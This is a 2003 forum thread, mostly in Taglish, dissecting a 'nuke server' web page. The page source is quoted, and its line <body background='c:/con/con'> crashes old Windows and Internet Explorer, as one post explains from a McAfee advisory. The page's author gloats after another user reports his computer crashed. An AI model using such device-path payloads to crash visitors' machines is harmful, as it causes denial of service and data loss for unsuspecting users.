|
|
Post by engkanto on Apr 29, 2003 19:11:49 GMT -5
Hackfinn, kaw pala may gawa nun langya ka. ;D
Ngayon ko lang na-realize.
Pano mo naitago yung source ng HTML(?)?
|
|
|
|
Post by hackfinn on Apr 29, 2003 19:27:00 GMT -5
Hackfinn, kaw pala may gawa nun langya ka. ;D Ngayon ko lang na-realize. Pano mo naitago yung source ng HTML(?)? hindi naman nakatago yung source, anytime pwedeng ibrowse yun kung hindi magka-crash yung IE. usually dapat lalabas lang sa browser mo eh simpleng text na "eh?" (walang quotes) saka "nuke server" naman dun sa titlebar. isa pa eh nagsisingit ng popup ads yung host ko kaya mukhang nagiging komplikado yung source code. pero kitang-kita niyo kaagad kung ano yung nagpapa crash dun, try ninyo ipost dito kung ano yun... ;D |
|
|
|
Post by shadowrun on Apr 29, 2003 19:45:18 GMT -5
hackfinnhindi ba Exploit-Nocnoc ang trojan sa website na yun? Detected sya ng McAfee e.  Hehe, ano ba yung nilagay mo dun? ;D
|
|
|
|
Post by engkanto on Apr 29, 2003 19:47:39 GMT -5
Eto yung source. So what does it do?
<html>
<title>nuke server</title>
<body background="c:/con/con">
eh?
</body>
</html><!-- ads begin -->
</noscript>
<!-- -->
</noscript>
<iframe src="ht**://info.accumail.com/fcadincl?shape=exitpopup&site=VA&area=DIR.EDU.BIZ&border=0&keyword=exitpopup" width=0 height=0 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no bordercolor=#000000><script language='JavaScript1.1' SRC="ht**://info.accumail.com/fcjserver?shape=exitpopup&site=VA&area=DIR.EDU.BIZ&border=0&keyword=exitpopup"></script></iframe>
<SCRIPT LANGUAGE="JavaScript">
<!--
browser = (((navigator.appName == "Netscape") && (parseInt(navigator.appVersion) >= 2 )) || ((navigator.appName == "Microsoft Internet Explorer") && (parseInt(navigator.appVersion) >= 2 )));
browser4 = (((navigator.appName == "Netscape") && (parseInt(navigator.appVersion) >= 4 )) || ((navigator.appName == "Microsoft Internet Explorer") && (parseInt(navigator.appVersion) >= 4 )));
if (browser4) {
if (!self.url) {
self.url = '';
}
if (parent.name != 'test') {
test = window.open("ht**://info.accumail.com/fcpopup?site=VA&shape=popup&border=1&area=DIR.EDU.BIZ", "test", "resizable=yes,width=528,height=200,scrollbars");
}
} else if (browser) {
if (!self.url) {
self.url = '';
}
if (parent.name != 'test') {
test = window.open("ht**://info.accumail.com/fcpopup?site=VA&shape=banner&border=1&area=DIR.EDU.BIZ", "test", "resizable=yes,width=528,height=200,scrollbars");
}
}
//-->
</SCRIPT>
<!-- ads end -->
|
|
|
|
Post by hackfinn on Apr 29, 2003 20:37:41 GMT -5
Eto yung source. So what does it do? <html> <title>nuke server</title> <body background="c:/con/con"> eh? </body> </html><!-- ads begin --> </noscript> <!-- --> </noscript> <iframe src="ht**://info.accumail.com/fcadincl?shape=exitpopup&site=VA&area=DIR.EDU.BIZ&border=0&keyword=exitpopup" width=0 height=0 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no bordercolor=#000000><script language='JavaScript1.1' SRC="ht**://info.accumail.com/fcjserver?shape=exitpopup&site=VA&area=DIR.EDU.BIZ&border=0&keyword=exitpopup"></script></iframe> <SCRIPT LANGUAGE="JavaScript"> <!-- browser = (((navigator.appName == "Netscape") && (parseInt(navigator.appVersion) >= 2 )) || ((navigator.appName == "Microsoft Internet Explorer") && (parseInt(navigator.appVersion) >= 2 ))); browser4 = (((navigator.appName == "Netscape") && (parseInt(navigator.appVersion) >= 4 )) || ((navigator.appName == "Microsoft Internet Explorer") && (parseInt(navigator.appVersion) >= 4 ))); if (browser4) { if (!self.url) { self.url = ''; } if (parent.name != 'test') { test = window.open("ht**://info.accumail.com/fcpopup?site=VA&shape=popup&border=1&area=DIR.EDU.BIZ", "test", "resizable=yes,width=528,height=200,scrollbars"); } } else if (browser) { if (!self.url) { self.url = ''; } if (parent.name != 'test') { test = window.open("ht**://info.accumail.com/fcpopup?site=VA&shape=banner&border=1&area=DIR.EDU.BIZ", "test", "resizable=yes,width=528,height=200,scrollbars"); } } //--> </SCRIPT> <!-- ads end --> hehee, hanapin niyo diyan yung sinasabi ng anti-v ni shadowrun, yun yung nagpapahang, idisregard na lang ninyo yung mga javascript popup ads ng host. kung tutuusin eto lang yun eh: <html> <title>nuke server</title> <body background="c:/con/con"> eh? </body> </html> |
|
|
|
Post by PatingSaDagat on Apr 30, 2003 2:24:54 GMT -5
di kaya ung <body background="c:/con/con">?
dahil naghahanap ung browser ng file n c:\con\con na di naman existing sa hard drive.
|
|
|
|
Post by hackfinn on Apr 30, 2003 2:57:23 GMT -5
di kaya ung <body background="c:/con/con">? dahil naghahanap ung browser ng file n c:\con\con na di naman existing sa hard drive. ok, yung concon nga ang nagpapacrash pero hindi necessarily hinahanap o wala yung file, bug talaga siya sa loob ng IE yang exclusive word na c:/con/con. meron din related na concon bug sa mga lumang version ng mIRC (v4-5 ata yun) hindi ko nga lang matandaan kung papaano na yung itinatype sa console. |
|
|
|
Post by engkanto on Apr 30, 2003 13:49:34 GMT -5
Maybe it only affects the old versions of IE. I'm using IE6.
|
|
|
|
Post by PatingSaDagat on Apr 30, 2003 23:26:24 GMT -5
This is an exploit which a user can use locally or remotely to cause Windows 95 or Windows 98 to crash. This is caused by using a specific path string that refers to a device driver that looks like "c:\[device]\[device]" example: c:\con\con or c:\nul\nul . By embedding these paths into html pages, the operating system will attempt to parse these and in turn cause the computer to crash. A reboot of the system is necessary
Courtesy of McAfee
|
|
|
|
Post by nerojulia on May 6, 2003 0:16:24 GMT -5
;Dnagcrash ang kumputer ko, hnd ko kc nbs yung page 2 ng thread kya reboot ako.mukhang hnd virus.gamit ko dr.web
hehehe! pang-exploit!
|
|
|
|
Post by hackfinn on May 6, 2003 21:36:54 GMT -5
hehee, another one bites the dust...
...cheers
|
|
user
New Member
Posts: 6
|
Post by user on May 28, 2003 15:24:37 GMT -5
haha, ok to ah...
|
|
